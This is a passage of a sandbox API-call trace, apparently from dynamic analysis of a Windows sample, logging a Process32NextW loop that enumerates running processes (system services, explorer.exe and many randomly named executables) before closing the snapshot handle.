th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0060.525] lstrlenW (lpString="services.exe") returned 12 [0060.525] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0060.525] lstrlenW (lpString="lsass.exe") returned 9 [0060.525] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.526] lstrlenW (lpString="svchost.exe") returned 11 [0060.526] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0060.527] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0060.527] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0060.527] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0060.527] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.528] lstrlenW (lpString="svchost.exe") returned 11 [0060.528] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0060.529] lstrlenW (lpString="dwm.exe") returned 7 [0060.529] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.529] lstrlenW (lpString="svchost.exe") returned 11 [0060.529] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.530] lstrlenW (lpString="svchost.exe") returned 11 [0060.530] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.531] lstrlenW (lpString="svchost.exe") returned 11 [0060.531] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.531] lstrlenW (lpString="svchost.exe") returned 11 [0060.532] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.532] lstrlenW (lpString="svchost.exe") returned 11 [0060.532] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.533] lstrlenW (lpString="svchost.exe") returned 11 [0060.533] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.542] lstrlenW (lpString="svchost.exe") returned 11 [0060.542] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.542] lstrlenW (lpString="svchost.exe") returned 11 [0060.542] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.543] lstrlenW (lpString="svchost.exe") returned 11 [0060.543] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0060.544] lstrlenW (lpString="spoolsv.exe") returned 11 [0060.544] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.544] lstrlenW (lpString="svchost.exe") returned 11 [0060.544] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.545] lstrlenW (lpString="svchost.exe") returned 11 [0060.545] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0060.546] lstrlenW (lpString="audiodg.exe") returned 11 [0060.546] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0060.546] lstrlenW (lpString="sihost.exe") returned 10 [0060.547] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.547] lstrlenW (lpString="svchost.exe") returned 11 [0060.547] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0060.548] lstrlenW (lpString="taskhostw.exe") returned 13 [0060.548] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0060.549] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0060.549] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0060.549] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0060.550] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0060.550] lstrlenW (lpString="explorer.exe") returned 12 [0060.550] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0060.551] lstrlenW (lpString="Memory Compression") returned 18 [0060.551] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0060.782] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0060.782] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0060.783] lstrlenW (lpString="SearchUI.exe") returned 12 [0060.783] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0060.783] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0060.783] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0060.784] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0060.784] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0060.785] lstrlenW (lpString="taskhostw.exe") returned 13 [0060.785] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0060.785] lstrlenW (lpString="UsoClient.exe") returned 13 [0060.785] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0060.786] lstrlenW (lpString="taskhostw.exe") returned 13 [0060.786] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0060.787] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0060.787] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0060.788] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0060.788] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0060.788] lstrlenW (lpString="msoia.exe") returned 9 [0060.788] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0060.789] lstrlenW (lpString="AppHostRegistrationVerifier.exe") returned 31 [0060.789] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver.exe")) returned 1 [0060.790] lstrlenW (lpString="screensaver.exe") returned 15 [0060.790] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="xml upper.exe")) returned 1 [0060.790] lstrlenW (lpString="xml upper.exe") returned 13 [0060.790] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defeat preston.exe")) returned 1 [0060.791] lstrlenW (lpString="defeat preston.exe") returned 18 [0060.791] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boss isolated.exe")) returned 1 [0060.792] lstrlenW (lpString="boss isolated.exe") returned 17 [0060.792] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0060.792] lstrlenW (lpString="member.exe") returned 10 [0060.793] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="chubby-er.exe")) returned 1 [0060.793] lstrlenW (lpString="chubby-er.exe") returned 13 [0060.793] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten awareness anymore.exe")) returned 1 [0060.794] lstrlenW (lpString="forgotten awareness anymore.exe") returned 31 [0060.794] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0060.795] lstrlenW (lpString="organization.exe") returned 16 [0060.795] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="citizenship_surfaces_neil.exe")) returned 1 [0060.795] lstrlenW (lpString="citizenship_surfaces_neil.exe") returned 29 [0060.795] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="spray-roman.exe")) returned 1 [0060.796] lstrlenW (lpString="spray-roman.exe") returned 15 [0060.796] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="elementary-east-examined.exe")) returned 1 [0060.797] lstrlenW (lpString="elementary-east-examined.exe") returned 28 [0060.797] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tank attacks.exe")) returned 1 [0060.797] lstrlenW (lpString="tank attacks.exe") returned 16 [0060.797] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="wires jacket.exe")) returned 1 [0060.798] lstrlenW (lpString="wires jacket.exe") returned 16 [0060.798] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="values.exe")) returned 1 [0060.799] lstrlenW (lpString="values.exe") returned 10 [0060.799] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebecca mid developer.exe")) returned 1 [0060.800] lstrlenW (lpString="rebecca mid developer.exe") returned 25 [0060.800] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="printersaerospace.exe")) returned 1 [0060.801] lstrlenW (lpString="printersaerospace.exe") returned 21 [0060.801] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defects_burning_rank.exe")) returned 1 [0060.802] lstrlenW (lpString="defects_burning_rank.exe") returned 24 [0060.802] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0060.803] lstrlenW (lpString="dllhost.exe") returned 11 [0060.803] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="joke.exe")) returned 1 [0060.804] lstrlenW (lpString="joke.exe") returned 8 [0060.804] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="dim-hindu-customize.exe")) returned 1 [0060.804] lstrlenW (lpString="dim-hindu-customize.exe") returned 23 [0060.805] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="documents.exe")) returned 1 [0060.805] lstrlenW (lpString="documents.exe") returned 13 [0060.805] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebel.exe")) returned 1 [0060.806] lstrlenW (lpString="rebel.exe") returned 9 [0060.806] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="arbor-tutorials-lawyers.exe")) returned 1 [0060.807] lstrlenW (lpString="arbor-tutorials-lawyers.exe") returned 27 [0060.807] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfc8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0060.808] lstrlenW (lpString="conhost.exe") returned 11 [0060.808] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfb0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0060.809] lstrlenW (lpString="conhost.exe") returned 11 [0060.809] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0060.810] lstrlenW (lpString="hgaibc.exe") returned 10 [0060.810] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0060.810] lstrlenW (lpString="cmd.exe") returned 7 [0060.810] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0060.811] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0060.811] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0060.812] lstrlenW (lpString="conhost.exe") returned 11 [0060.812] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf48, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0060.813] lstrlenW (lpString="conhost.exe") returned 11 [0060.813] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.813] lstrlenW (lpString="svchost.exe") returned 11 [0060.813] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.814] lstrlenW (lpString="svchost.exe") returned 11 [0060.814] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0061.212] CloseHandle (hObject=0x2c0) returned 1 